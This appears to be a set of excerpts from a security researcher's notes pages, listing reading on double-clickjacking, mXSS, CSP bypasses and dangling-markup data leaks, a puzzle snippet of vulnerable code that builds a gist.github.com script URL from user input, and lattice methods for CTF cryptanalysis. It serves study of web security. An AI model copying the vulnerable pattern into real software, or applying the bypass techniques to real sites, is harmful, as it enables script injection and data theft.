About This is a place to park some well-written researches. If I decided to research into any of these topics it will have its own dedicated page. Web Exploitation Techniques DoubleClickjacking: A New Era of UI Redressing: This completely revolutionalise how we look at clickjacking, from iframe with a single click to a double click flow. Pressing Buttons with Popups (on Twitch, LinkedIn and more): Some very neat tricks (like the Double Clickjacking technique above) to generate a click on the OAuth dialog boxes of real targets.

About I have not really mastered this concept yet. mXSS is my introduction to reading the HTML specs. I will consider myself to somewhat understand the concept once I find a mXSS bug. This page is mainly to park some important research in mXSS that I find very interesting. Researches S1r1us mXSS Explained series: Part 1 and Part 2. His Github MXSS repository also contains a lot of insights. mXSS cheatsheet (to save some sanity reading HTML specs) SecurityMB DOMPurify 2.

About Parking some slick CSP bypasses and techniques to work around CSP. No analysis here for now Some links may not even be related to bypassing CSP, but it may touch some part of XSS exploitation that might be good to know. Researches lcamtuf Post-XSS Bypass browser’s mitigation against dangling markup injection form-action trick and other methods: Leaking sensitive data through <form> and misconfigured CSP policy. Mentions defenses of browsers against dangling markup injection and how to effectively bypass them.

Why this research? I stumbled upon this tweet by ixSly about a vulnerability in a code snippet found in Outline You can try to figure out the vulnerability here by yourself: /// userUrl is user input /// CSP: "script-src gist.github.com" const userUrl = new URL(userUrl); if (userUrl.host === "gist.github.com" && userUrl.protocol === "https:") { const gistId = userUrl.pathname.split("/")[2]; const embedScriptUrl = `https://gist.github.com/${gistId}.js`; ctx.body = ` <html> <body> <script type="text/javascript" src="${embedScriptUrl}"></script> </body> </html> `; } Github Gist JSONP endpoint I thought this is some bypass to “escape” the src quote of script.

Foreword I was struggling a lot with lattices in CTF challenges, so I spent some time learning about what are lattices and how to use them in solving CTF Challenges. Great resource to get started A Gentle Tutorial for Lattice-Based Cryptanalysis: highly recommend Lightweight Introduction to Lattices Coppersmith’s Method and Related Applications Finding Small Roots of Bivariate Integer Polynomial Equations: a Direct Approach The following will be about this paper: Recovering cryptographic keys from partial information, by example which heavily employs lattices for recovering cryptographic secrets.